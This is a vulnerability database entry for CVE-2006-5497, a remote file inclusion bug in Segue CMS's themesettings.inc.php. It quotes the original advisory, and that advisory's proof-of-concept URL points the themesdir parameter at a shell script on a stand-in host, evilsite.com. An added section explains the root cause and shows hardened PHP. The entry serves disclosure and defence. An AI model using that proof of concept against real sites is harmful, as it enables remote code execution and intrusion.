Segue CMS Themesdir 'themesettings.inc.php' Remote File Inclusion Vulnerability

Vulnerability ID: 1111332    Vulnerability type: Input validation
Published: 2006-10-19    Updated: 2006-11-01
CVE ID: CVE-2006-5497    CNNVD ID: CNNVD-200610-408
Platform: PHP    CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/2600
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-408
|Details
A PHP remote file inclusion vulnerability exists in themes/program/themesettings.inc.php in Segue CMS 1.5.8 and earlier. When register_globals is enabled, remote attackers can execute arbitrary PHP code via a URL in the themesdir parameter.
|Exploit
+-------------------------------------------------------------------------------------------
+ Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: Segue CMS <= 1.5.8
+ Vendor ............: http://segue.middlebury.edu/
+ Download ..........: http://sourceforge.net/project/showfiles.php?group_id=82171
+ Description .......: "Segue is an open source collaborative content management system"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Segue CMS themes/program/themesettings.inc.php does not initialize the $themesdir variable
+ before using it to include files; assuming register_globals = on, we can initialize the
+ variable in a query string and include a remote file of our choice. Tested and working on
+ versions 1.5.4 and 1.5.8 (previous versions may also be affected).
+ 
+ Vulnerable Code:
+ themes/program/themesettings.inc.php, line(s) 02: include("$themesdir/$theme/colors.inc.php");
+ 
+ Proof of Concept:
+ http://[target]/[path]/themes/program/themesettings.inc.php?themesdir=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-10-19]
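As an added illustration (not Segue CMS code and not part of the advisory above), the PHP below places the include pattern the advisory describes next to a hardened form. The root cause is an include path built from a variable that the script never assigns, so under register_globals a request parameter fills it in. The THEMES_DIR constant, the function names and the sample inputs are assumptions for the example.

```php
<?php
// Added example, not Segue CMS code. Everything except the quoted include
// line is constructed for illustration.

// --- Vulnerable pattern (as described in the advisory) ---
// themesettings.inc.php line 2 reads:
//     include("$themesdir/$theme/colors.inc.php");
// $themesdir is never assigned in the script. With register_globals=On, a
// request parameter named "themesdir" becomes that variable, so the include
// target is request-controlled; with allow_url_include on, it can be a URL.
function vulnerable_include_target(string $themesdir, string $theme): string
{
    return "$themesdir/$theme/colors.inc.php";
}

// --- Hardened form ---
// 1. The base directory is a constant, never taken from request data.
// 2. The theme name must match a strict allow-list pattern.
// 3. The resolved path must stay inside the base directory.
const THEMES_DIR = __DIR__ . '/../themes'; // assumption: where themes live

function is_valid_theme_name(string $theme): bool
{
    // No slashes, dots, colons or spaces: rules out "..", "http:" and "?".
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme) === 1;
}

function safe_theme_colors_path(string $theme): ?string
{
    if (!is_valid_theme_name($theme)) {
        return null;
    }
    $base = realpath(THEMES_DIR);
    $path = realpath(THEMES_DIR . '/' . $theme . '/colors.inc.php');
    if ($base === false || $path === false) {
        return null; // base or theme file does not exist
    }
    // realpath() has already collapsed any ".." segments; the prefix check
    // rejects anything that still resolves outside the themes directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs showing what the allow-list rejects.
$samples = [
    'default',                          // accepted
    'blue_theme-2',                     // accepted
    'http://example.invalid/x.php?',    // rejected: scheme, slashes, "?"
    '../../config',                     // rejected: dots and slashes
    "theme\0",                          // rejected: NUL byte
];
foreach ($samples as $s) {
    printf("%-32s %s\n", json_encode($s), is_valid_theme_name($s) ? 'ok' : 'rejected');
}

// Usage in the including script: the base path is fixed, the theme name is
// validated, and an unknown theme is an error rather than an include of
// whatever the request named.
$theme = $_GET['theme'] ?? 'default';
$colors = safe_theme_colors_path($theme);
if ($colors === null) {
    http_response_code(400);
    exit('unknown theme');
}
include $colors;
```

Two configuration settings back this up: register_globals (deprecated in PHP 5.3 and removed in 5.4) is the precondition the advisory names, and allow_url_include, Off by default, is what lets include() fetch a remote URL at all. Neither setting removes the underlying bug, which is an include path assembled from an unassigned variable; the allow-list and containment check above are what fix it.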
|References
Source: XF
Name: seguecms-themesettings-file-include(29692)
Link: http://xforce.iss.net/xforce/xfdb/29692
Source: BID
Name: 20640
Link: http://www.securityfocus.com/bid/20640
Source: OSVDB
Name: 29904
Link: http://www.osvdb.org/29904
Source: MILW0RM
Name: 2600
Link: http://www.milw0rm.com/exploits/2600
Source: VUPEN
Name: ADV-2006-4122
Link: http://www.frsirt.com/english/advisories/2006/4122
Source: sourceforge.net
Link: http://sourceforge.net/forum/forum.php?forum_id=625467
Source: SECUNIA
Name: 22491
Link: http://secunia.com/advisories/22491
Source: MILW0RM
Name: 2600
Link: http://milw0rm.com/exploits/2600